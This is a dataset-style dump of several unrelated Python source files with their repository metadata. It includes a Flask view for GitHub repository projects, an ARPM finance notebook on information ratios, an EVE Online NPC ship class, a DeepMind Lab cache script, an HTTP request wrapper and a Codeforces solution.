logger = logging.getLogger(__name__)
@bp.route('/')
def index():
    """List the user's GitHub repositories (own and organization-owned) that
    do not have a project yet, grouped by owner login."""
    # The user's own repositories, with the owner login injected as a SQL
    # literal so the row shape matches the organization query below.
    user_repositories = current_user.repositories.with_entities(
        db.literal(current_user.gh_login).label('gh_owner_login'),
        User.Repository.gh_id.label('gh_id'),
        User.Repository.gh_full_name.label('gh_full_name'))
    # Repositories of the organizations the user belongs to.
    user_org_repositories = current_user.organizations.join(
        Organization.Repository
    ).with_entities(
        Organization.gh_login.label('gh_owner_login'),
        Organization.Repository.gh_id.label('gh_id'),
        Organization.Repository.gh_full_name.label('gh_full_name'),
    )
    repositories = user_repositories.union_all(user_org_repositories).subquery()
    # Anti-join: keep only repositories with no Project row (outer join plus
    # NULL filter; `== None` is SQLAlchemy's IS NULL idiom).
    repositories_without_project = db.session.query(repositories).outerjoin(
        Project, repositories.c.gh_id == Project.gh_id
    ).filter(Project.id == None).all()
    repositories_by_owner = collections.defaultdict(list)
    for gh_owner_login, gh_id, gh_full_name in repositories_without_project:
        repositories_by_owner[gh_owner_login].append((gh_id, gh_full_name))
    return render_template(
        'repos/index.html', repositories_by_owner=repositories_by_owner)
@bp.route('/sync/')
def sync():
    """Updates the organizations and repositories to which
    the user has admin access.

    Rebuilds the cached GitHub data from scratch: deletes the old rows, then
    refetches organizations and repositories through the GitHub API helpers.
    """
    # Delete all the old repositories and organizations
    # (don't do batch delete to let ORM-level cascades work)
    for repo in current_user.repositories:
        db.session.delete(repo)
    for org in current_user.organizations:
        db.session.delete(org)
    # Fill the user's organizations and their repositories
    gh_orgs, gh_repos_by_org_id = current_user.get_gh_org_repos()
    for gh_org in gh_orgs:
        org = Organization(
            gh_id=gh_org.id,
            gh_login=gh_org.login,
            gh_name=gh_org.name)
        for gh_repo in gh_repos_by_org_id[gh_org.id]:
            repo = Organization.Repository.from_gh_repo(gh_repo)
            org.repositories.append(repo)
        current_user.organizations.append(org)
    # Fill the user's own repositories
    for gh_repo in current_user.get_gh_repos():
        repo = User.Repository.from_gh_repo(gh_repo)
        current_user.repositories.append(repo)
    # Record when this synchronization happened.
    current_user.repos_last_synchronized_at = datetime.datetime.utcnow()
    db.session.commit()
    return redirect(url_for('.index'))
@bp.route('/<int:gh_id>/on/', methods=('POST',))
def on(gh_id):
    """Creates :class:`app.models.Project` for GitHub repository
    with `gh_id`.

    404 if the repository is not among the user's (or their organizations')
    cached repositories; 400 if a project for it already exists.
    """
    # First try to find the user's repository with `gh_id`
    repo = (current_user.repositories
            .filter(User.Repository.gh_id == gh_id).first())
    # If not found, try to find such a repository among
    # the user organizations' repositories
    repo = repo or (current_user.organizations
                    .join(Organization.Repository)
                    .filter(Organization.Repository.gh_id == gh_id)
                    .with_entities(Organization.Repository).first())
    if not repo:
        abort(404)
    if Project.query.filter_by(gh_id=repo.gh_id).first():
        # If project for repository with `gh_id` already exists,
        # we should show page where the user can ask for an invite
        # to the existing project.
        # For now just show 400
        abort(400)
    project = Project(
        owner=current_user,
        gh_id=repo.gh_id,
        gh_name=repo.gh_name,
        gh_full_name=repo.gh_full_name,
        gh_login=repo.parent.gh_login,
        gh_ssh_clone_url=repo.gh_ssh_clone_url,
        gh_https_clone_url=repo.gh_https_clone_url,
        is_public=repo.is_public)
    db.session.add(project)
    ok_to_commit = True
    if not project.is_public:
        # Private repositories get a deploy key (presumably used for
        # cloning -- see DeployKey).
        project.deploy_key = DeployKey(passphrase=project.passphrase)
        ok_to_commit = ok_to_commit and project.deploy_key.ensure()
    ok_to_commit = ok_to_commit and project.sync_memberships_with_github()
    if ok_to_commit:
        db.session.commit()
        return redirect(url_for('projects.settings', id=project.id))
    else:
        # One of the GitHub-side steps failed; roll everything back.
        db.session.rollback()
        flash('Sorry, failed to create a project. Please try again later.',
              'warning')
        return redirect(url_for('.index'))
| [
"anthony.romanovich@gmail.com"
] | anthony.romanovich@gmail.com |
945f3b5e2ce68a78a710408a838215d972d40c1a | 3740de0d6e43ea140fc09ab314e4c492603ba185 | /scripts/sources/s_generalized_flam_toy.py | 7cc7fd1ff125b384c9bb6a7535b3cfea5e5b6ec7 | [
"MIT"
] | permissive | s0ap/arpmRes | 29c60c65fd3e11be1cc31d46494e5b3ebf6e05ab | ddcc4de713b46e3e9dcb77cc08c502ce4df54f76 | refs/heads/master | 2022-02-16T05:01:22.118959 | 2019-08-20T16:45:02 | 2019-08-20T16:45:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,933 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.1.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # s_generalized_flam_toy [<img src="https://www.arpm.co/lab/icons/icon_permalink.png" width=30 height=30 style="display: inline;">](https://www.arpm.co/lab/redirect.php?code=s_generalized_flam_toy&codeLang=Python)
# For details, see [here](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy).
# +
import numpy as np
from arpym.statistics import objective_r2, simulate_normal
from arpym.tools import solve_riccati
# -
# ## [Input parameters](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-parameters)
# +
sig2 = np.array
rho = 0.3
epsi = 0.45
s = np.array([[0.3], [0.1]])
w = np.array([[1], [-3]])
sig = 1
sig2 = np.array([[1, 0.5, epsi, epsi],
[0.5, 1, epsi, epsi],
[epsi, epsi, 1, rho],
[epsi, epsi, rho, 1]])
# -
# ## [Step 1](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step01): conditional expectation and covariance
# +
def cond_exp_x(s, k=2, sig2=sig2):
    # Conditional expectation E{X|S=s} of the first two (target) variables
    # given the last k (signal) variables: sig_xs @ inv(sig_ss) @ s.
    return sig2[:2, -k:] @ np.linalg.solve(sig2[-k:, -k:], s)
def cond_cov_x(k=2, sig2=sig2):
return sig2[:2, :2] - sig2[:2, -k:] @ np.linalg.solve(sig2[-k:, -k:],
sig2[:2, -k:].T)
cond_mu_x = cond_exp_x(s)
cond_sig2_x = cond_cov_x()
# -
# ## [Step 2](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step02): Max of cond. info ratio and combination at which is attained
w_sig = sig * np.linalg.solve(cond_sig2_x, cond_mu_x) / \
np.sqrt(cond_mu_x.T @ np.linalg.solve(cond_sig2_x, cond_mu_x))
max_ir = w_sig.T @ cond_mu_x / np.sqrt(w_sig.T @ cond_sig2_x @ w_sig)
# ## [Step 3](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step03): Max of cond. info ratio via flam and transfer coefficient
max_ir_flam = np.sqrt(cond_mu_x.T @ np.linalg.solve(cond_sig2_x,
cond_mu_x))
ir_arb = w.T @ cond_mu_x / np.sqrt(w.T @ cond_sig2_x @ w)
tc = ir_arb / max_ir_flam
# ## [Step 4](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step04): Max. unconditional info ratios
# +
def uncond_max_ir(k, sig2=sig2):
    # Unconditional maximum information ratio, estimated by Monte Carlo over
    # 1000 simulated signal scenarios as sqrt(mean of mu' inv(sig) mu).
    # Monte Carlo scenarios for the signals
    s_j = simulate_normal(np.zeros((2)), sig2[-2:, -2:], 1000).T
    cond_mu_x_j = cond_exp_x(s_j[:k, :], k, sig2)
    # Monte Carlo scenarios for the conditioned max info ratio
    max_ir_j = cond_mu_x_j.T @ \
        np.linalg.solve(cond_cov_x(k, sig2),
                        cond_mu_x_j)
    return np.sqrt(np.trace(max_ir_j) / 1000)
uncond_maxir_12 = uncond_max_ir(2)
uncond_maxir_1 = uncond_max_ir(1)
uncond_maxir_2 = uncond_max_ir(1)
print(uncond_maxir_12**2 - (uncond_maxir_1**2 + uncond_maxir_2**2))
# verify that (epsi << 1) implies weak signals
sig2_weak = np.array([[1, 0.5, 0.1, 0.1],
[0.5, 1, 0.1, 0.1],
[0.1, 0.1, 1, rho],
[0.1, 0.1, rho, 1]])
print(cond_cov_x(2, sig2_weak))
print(sig2[:2, :2])
# independent signals (rho = 0) and weak correlation (epsi << 1)
sig2_weak_ind = np.array([[1, 0.5, 0.1, 0.1],
[0.5, 1, 0.1, 0.1],
[0.1, 0.1, 1, 0],
[0.1, 0.1, 0, 1]])
maxir_12_weak_ind = uncond_max_ir(2, sig2_weak_ind)
maxir1_weak_ind = uncond_max_ir(1, sig2_weak_ind)
maxir2_weak_ind = uncond_max_ir(1, sig2_weak_ind)
print(maxir_12_weak_ind**2 - (maxir1_weak_ind**2 +
maxir2_weak_ind**2))
# -
# ## [Step 5](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step05): information coefficients
# +
def ic(k, sig2=sig2):
    # Information coefficient of the first k signals: sqrt(2 * r2), where r2
    # is the objective R-squared for the two target variables.
    return np.sqrt(2 * objective_r2(np.arange(k), sig2, 2, sig2[:2, :2]))
ic_12 = ic(2)
ic_1 = ic(1)
ic_2 = ic(1)
print(ic_12**2 - (ic_1**2 + ic_2**2))
# independent signals (rho = 0)
sig2_ind = np.array([[1, 0.5, epsi, epsi],
[0.5, 1, epsi, epsi],
[epsi, epsi, 1, 0],
[epsi, epsi, 0, 1]])
ic_12_ind = ic(2, sig2_ind)
ic_1_ind = ic(1, sig2_ind)
ic_2_ind = ic(1, sig2_ind)
print(ic_12_ind**2 - (ic_1_ind**2 + ic_2_ind**2))
# -
# ## [Step 6](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step06): linkage matrix
# +
def linkage(sig2=sig2):
    # Linkage matrix: the cross-covariance block sig_xs normalized on both
    # sides by Riccati square roots of sig_xx and sig_ss (two linear solves).
    return np.linalg.solve(solve_riccati(sig2[:2, :2]),
                           np.linalg.solve(solve_riccati(sig2[2:, 2:]).T,
                                           sig2[:2, 2:].T).T)
p_s_x = linkage(sig2)
# -
# ## [Step 7](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step07): Fundamental law of active management (weak signals)
# +
sig2_weak = np.array([[1, 0.5, 0.1, 0.1],
[0.5, 1, 0.1, 0.1],
[0.1, 0.1, 1, rho],
[0.1, 0.1, rho, 1]])
p_s_x_weak = linkage(sig2_weak_ind)
# information coefficient
ic_linkage = np.sqrt(np.trace(p_s_x_weak @ p_s_x_weak.T))
# max information ratio
s_tilde = np.linalg.solve(solve_riccati(sig2_weak[2:, 2:]), s)
maxir_linkage = uncond_max_ir(2, sig2=sig2_weak)
print(maxir_linkage**2 - ic_linkage**2)
# -
# ## [Step 8](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step08): Fundamental law of active management (weak and ind. signals)
# +
p_s_x_weak_ind = linkage(sig2_weak_ind)
# information coefficient (single signal)
ic_linkage_1 = np.sqrt(np.trace(p_s_x_weak[:, [0]] @ p_s_x_weak[:, [0]].T))
print(ic_linkage_1 * np.sqrt(2) - maxir_12_weak_ind)
| [
"dario.popadic@yahoo.com"
] | dario.popadic@yahoo.com |
34dadc42e9085d239b0e37efcf94d7e7460e7403 | 8fcc27160f8700be46296568260fa0017a0b3004 | /client/eve/client/script/environment/spaceObject/entityShip.py | 253efe958a9487e51db0b4662828ae06dbef0567 | [] | no_license | connoryang/dec-eve-serenity | 5d867f4eedfa896a4ef60f92556356cafd632c96 | b670aec7c8b4514fc47cd52e186d7ccf3aabb69e | refs/heads/master | 2021-01-22T06:33:16.303760 | 2016-03-16T15:15:32 | 2016-03-16T15:15:32 | 56,389,750 | 1 | 0 | null | 2016-04-16T15:05:24 | 2016-04-16T15:05:24 | null | UTF-8 | Python | false | false | 3,545 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\environment\spaceObject\entityShip.py
import blue
import destiny
from eve.client.script.environment.spaceObject.spaceObject import SpaceObject
from eve.client.script.environment.spaceObject.ship import Ship
from eve.client.script.environment.model.turretSet import TurretSet
import eve.common.lib.appConst as const
import evetypes
class EntityShip(Ship):
    """Space object for an NPC ('entity') ship.

    Extends Ship with lazy fitting of NPC gun turrets and, when the NPC
    type fires missiles, a single missile-launcher turret set.
    (Python 2 code; indentation reconstructed from a flattened dump.)
    """

    # Class-level memo shared by all NPC ships:
    # entity missile typeID -> launcher typeID (see DetermineLauncherTypeFromMissileID).
    launcherTypeCache = {}

    def __init__(self):
        Ship.__init__(self)
        self.gfxTurretID = None
        self.fitted = False  # set True by FitHardpoints; guards against double fitting
        self.typeID = None
        self.modules = {}  # turret sets keyed by 0 (launcher) and self.id (guns)
        self.model = None
        self.launcherTypeID = None

    def LoadModel(self, fileName = None, loadedModel = None):
        # Resolve the NPC's gun-turret type and (optional) launcher type from
        # its godma type attributes before delegating to the base model load.
        godma = self.sm.GetService('godma')
        godmaStateManager = godma.GetStateManager()
        godmaType = godmaStateManager.GetType(self.typeID)
        self.turretTypeID = godmaType.gfxTurretID
        missileTypeID = godmaType.entityMissileTypeID
        self.launcherTypeID = self.DetermineLauncherTypeFromMissileID(self.typeID, missileTypeID)
        # NOTE: intentionally bypasses Ship.LoadModel and uses the generic
        # SpaceObject path — presumably to skip player-ship fitting; confirm.
        SpaceObject.LoadModel(self)

    def Assemble(self):
        Ship.Assemble(self)
        self.FitBoosters(isNPC=True)
        self.SetupSharedAmbientAudio()

    def DetermineLauncherTypeFromMissileID(self, typeID, missileTypeID):
        """Return the launcher typeID matching ``missileTypeID``.

        Returns None when the NPC type lacks the missile-launching effect.
        Successful lookups are memoized in the class-level launcherTypeCache.
        """
        launcherType = self.launcherTypeCache.get(missileTypeID, None)
        if launcherType:
            return launcherType
        clientDogma = self.sm.GetService('clientDogmaStaticSvc')
        usesMissiles = clientDogma.TypeHasEffect(typeID, const.effectMissileLaunchingForEntity)
        if not usesMissiles:
            return
        godma = self.sm.GetService('godma')
        group = int(godma.GetTypeAttribute2(missileTypeID, const.attributeLauncherGroup))
        # Pick the first type in the launcher group that has meta variants
        # registered; this is the visual launcher model to fit.
        for typeID in evetypes.GetTypeIDsByGroup(group):
            if typeID in cfg.invmetatypesByParent:
                launcherType = typeID
                self.launcherTypeCache[missileTypeID] = launcherType
                break
        return launcherType

    def LookAtMe(self):
        # Defer turret fitting until the ship is actually looked at,
        # avoiding the cost for NPCs that are never focused.
        if self.model is None:
            return
        if not self.fitted:
            self.FitHardpoints()

    def FitHardpoints(self, blocking = False):
        """Fit launcher (if any) and gun turret sets onto the model's locators.

        Idempotent: does nothing when already fitted or when no model is loaded.
        """
        if self.model is None:
            self.LogWarn('FitHardpoints - No model')
            return
        if self.fitted:
            return
        self.fitted = True
        turretLocatorCount = int(self.model.GetTurretLocatorCount())
        if self.launcherTypeID:
            # The launcher consumes one locator; the remaining locators (at
            # least one) are left for the gun turrets below.
            launcherSet = TurretSet.FitTurret(self.model, self.launcherTypeID, turretLocatorCount, count=1)
            self.modules[0] = launcherSet
            turretLocatorCount = max(turretLocatorCount - 1, 1)
        newTurretSet = TurretSet.FitTurret(self.model, self.turretTypeID, -1, count=turretLocatorCount)
        if newTurretSet is not None:
            self.modules[self.id] = newTurretSet

    def Release(self):
        # Release all fitted turret sets and break their back-references
        # before handing off to the base-class release.
        if self.released:
            return
        for turretPair in self.modules.itervalues():
            if turretPair is not None:
                turretPair.Release()
                turretPair.owner = None
        self.modules = {}
        Ship.Release(self)
class EntitySleeper(EntityShip):
    """NPC sleeper ship: fits hardpoints like EntityShip but never a launcher."""

    def FitHardpoints(self, blocking = False):
        # Sleepers do not get a dedicated missile-launcher turret set, so any
        # resolved launcher type is zeroed out before the base fitting runs.
        if self.launcherTypeID:
            self.launcherTypeID = 0
        EntityShip.FitHardpoints(self)
| [
"masaho.shiro@gmail.com"
] | masaho.shiro@gmail.com |
4498670807eaeaf54a06134d1ce03533c8bc8c45 | ca8167a83eaec916437c0fdd757a76bb0441a5a3 | /envs/dmlab/dmlab_populate_cache.py | 495f3a7c761a2d9edb2d33b8079a14dbf225b782 | [
"Apache-2.0"
] | permissive | Zhehui-Huang/scalable_agent | b470afe0130e95d2e63e521abd7bf61016e5e358 | 505909ad9f2d3e9bce8bb9201e05e780002428df | refs/heads/master | 2022-04-25T23:21:40.302551 | 2020-02-03T07:43:35 | 2020-02-03T07:43:35 | 257,515,137 | 0 | 0 | Apache-2.0 | 2020-04-21T07:33:26 | 2020-04-21T07:33:25 | null | UTF-8 | Python | false | false | 850 | py | import sys
from algorithms.utils.multi_env import MultiEnv
from envs.dmlab.dmlab_utils import DmlabGymEnv
from utils.utils import log
def main():
def make_env(env_config):
env = DmlabGymEnv('contributed/dmlab30/rooms_watermaze', 4)
return env
num_envs = 64
num_workers = 16
multi_env = MultiEnv(num_envs, num_workers, make_env, stats_episodes=100)
num_resets = 0
try:
while True:
multi_env.reset()
num_resets += 1
num_envs_generated = num_resets * num_envs
log.info('Generated %d environments...', num_envs_generated)
except (Exception, KeyboardInterrupt, SystemExit):
log.exception('Interrupt...')
finally:
log.info('Closing env...')
multi_env.close()
return 0
if __name__ == '__main__':
sys.exit(main())
| [
"petrenko@usc.edu"
] | petrenko@usc.edu |
70d21f0315e69b783a6c51389ee8a14057eec12e | ae08a53864b4ec19458eae7bdf072b91b489e595 | /nina-service/app/api/v1/users/messenger.py | d8808844ee411840587e5feb56cf0cb9c1f54339 | [] | no_license | OscarGibson/docker-messenger-test | aee90378691527fd4f7156c3b16490393a548e14 | f04c3d932818b16fa6a304e41ff5492a6d67ccb7 | refs/heads/master | 2022-12-09T07:49:10.324014 | 2018-09-12T07:04:20 | 2018-09-12T07:04:20 | 148,104,678 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 487 | py | import requests
class Messenger:
    """Thin wrapper around ``requests`` for forwarding JSON calls to another service."""

    def __init__(self, receiver, *args, **kwargs):
        # `receiver` is a URL template containing a '%s' placeholder that is
        # filled with `params` in send(); extra args are accepted and ignored.
        self.receiver = receiver
        self.headers = {
            'content-type' : 'application/json',
        }

    def set_headers(self, request_object):
        """Propagate the incoming request's Authorization header to outgoing calls."""
        self.headers['Authorization'] = request_object.headers.get('Authorization')

    def send(self, data= None, method= 'get', params= ''):
        """Issue an HTTP call (`method` names a requests function, e.g. 'get',
        'post') to the receiver URL with `data` as the JSON body.

        Bugfix: the original used a mutable default ``data={}``, a classic
        Python pitfall (one dict shared across all calls). ``None`` is now the
        sentinel and is normalized to a fresh ``{}`` to preserve the old
        behavior of always sending a JSON body.
        """
        if data is None:
            data = {}
        return getattr(requests, method)(self.receiver % params, json= data, headers= self.headers)
"user@users-MacBook-Pro.local"
] | user@users-MacBook-Pro.local |
1da694b5ea387596423c38640e879d0c7a989f94 | 4142b8c513d87361da196631f7edd82f11465abb | /python/round481/978C.py | 507c51c1f9c84ef6c7c7bff283409bd7ae7ba262 | [] | no_license | npkhanhh/codeforces | b52b66780426682ea1a3d72c66aedbe6dc71d7fe | 107acd623b0e99ef0a635dfce3e87041347e36df | refs/heads/master | 2022-02-08T17:01:01.731524 | 2022-02-07T10:29:52 | 2022-02-07T10:29:52 | 228,027,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | from sys import stdin
import bisect
n, m = list(map(int, stdin.readline().split()))
a = list(map(int, stdin.readline().split()))
b = list(map(int, stdin.readline().split()))
p_a = [0]*n
p_a[0] = a[0]
for i in range(1, n):
p_a[i] = a[i] + p_a[i-1]
p_a = [0]+p_a
for i in b:
dorm = bisect.bisect(p_a, i)
room = i - p_a[dorm-1]
if room == 0:
dorm -= 1
room = a[dorm-1]
print(dorm, room)
| [
"npkhanh93@gmail.com"
] | npkhanh93@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.